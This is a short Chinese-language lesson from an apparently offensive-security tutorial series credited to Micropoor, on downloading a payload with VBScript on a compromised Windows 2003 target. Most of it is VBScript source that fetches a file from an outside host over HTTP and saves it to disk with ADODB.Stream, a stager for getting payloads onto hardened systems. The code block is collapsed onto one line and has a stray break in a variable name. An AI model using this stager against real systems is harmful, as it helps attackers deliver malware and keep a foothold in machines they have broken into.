# 第三十九课：vbs一句话下载payload补充

在实战中，会碰到许多让人敬畏的环境，也许无法执行，或者无法把下载参数带入其中，故补充第七季 vbs 参数化的下载。

**靶机：**windows 2003\
![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJx6OsATTmDu7q3h-d%2F130baad813eacf09b1932ecb7e5d4279.jpg?generation=1551060435457998\&alt=media)

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJx6OuajsAXwPTgDnM%2Fd434ad0c2a6c5f531e908fedca5f2044.jpg?generation=1551060443232795\&alt=media)

## 附：源码如下：

\`\`\`visual basic strFileURL = "<http://192.168.1.115/robots.txt>" strHDLocation = "c:\test\logo.txt" Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP") objXMLHTTP.open "GET", strFileURL, false objXMLHTTP.send() If objXMLHTTP.Status = 200 Then Set objADOStream = CreateObject("ADODB.Stream") objADOStream.Open objADOStream.Type = 1 objADOStream.Write objXMLHTTP.ResponseBody objADOStream.Position = 0 Set objFSO = CreateObject("Scripting.FileSystemObject") If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocati on Set objFSO = Nothing objADOStream.SaveToFile strHDLocation objADOStream.Close Set objADOStream = Nothing End if Set objXMLHTTP = Nothing

\`\`\`

> Micropoor